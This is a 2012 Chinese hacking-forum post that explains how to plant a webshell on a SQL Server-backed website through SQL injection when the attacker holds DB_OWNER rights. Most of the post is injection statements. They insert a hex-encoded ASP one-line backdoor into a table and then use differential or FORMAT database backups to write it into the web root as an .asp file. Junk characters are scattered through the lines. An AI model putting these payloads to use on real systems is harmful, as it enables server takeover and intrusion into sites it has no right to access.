找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2085|回复: 0
打印 上一主题 下一主题

DB_OWNER权限得到webshell的改进方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-31 09:57:12 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
减少备份文件大小,得到可执行的webshell成功率提高不少# \& d9 l  I* f$ K" G, @& W0 o
% K) L9 n" |, i1 x' E, R! H
一利用差异备份
2 `' O" l& ]* q/ m: P; I加一个参数WITH DIFFERENTIAL
$ v$ ]7 p+ w! g0 v2 l) t5 H4 H/ x" g, \  S, g
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s8 Y! ^* \- |+ E  S
create table [dbo].[xiaolu] ([cmd] [image]);( n( m: |! I, `; f
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
; Y2 \1 S' O- Kdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL% ~8 O4 B% X  h7 o- \% P
" W1 Q8 Q7 E( o7 q- r
二利用完全FORMAT
1 X  f9 K/ S8 B( O; l2 U) [  l0 S* v加一个参数WITH FROMAT. K7 \. X4 I0 ^
有些页面对数据库要执行几次,而备份又默认是每次都以追加的方式,如果一个注入点对数据库有几次操作,而备份的文件就 几倍的增加,所以5 v6 U3 N# o) x0 L1 p
. ?/ N3 i% R/ {# v  F: m6 J% A7 p
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s
& V4 H+ B% x* H0 D5 Zcreate table [dbo].[xiaolu] ([cmd] [image]); insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
# v# b- d8 d+ L0 Odeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH FORMAT
) c! N  R7 E+ c3 j
* o4 G" h' C( o' U总的来说就是那么简单几句,下面以备份数据库model为例子2 J7 M5 J: b3 o, O  p

! d0 r2 w7 }. O! u7 Cid=1;use model create table cmd(str image);insert into cmd(str) values (”)1 J! l. j% X; t  }8 d8 K7 N" W% V

; Y3 V2 H5 w3 s& Gid=1;backup database model to disk=’你的路径‘ with differential,format;–/ f) t# s7 W( S) c( J' P

8 w9 `# e3 f7 J$ N  f) J, T3 W
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表